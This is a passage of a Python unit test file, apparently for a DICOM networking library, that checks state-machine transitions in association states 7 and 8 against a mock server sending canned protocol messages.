assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
#primitive = self.assoc.dul.receive_pdu(wait=False)
#assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15']
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rj),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', p_data_tf),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # get a_assoc_rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_release_rp),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15']
def test_evt16(self):
"""Test Sta8 + Evt16."""
# Sta8 + Evt16 -> AA-3 -> Sta13
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_abort),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
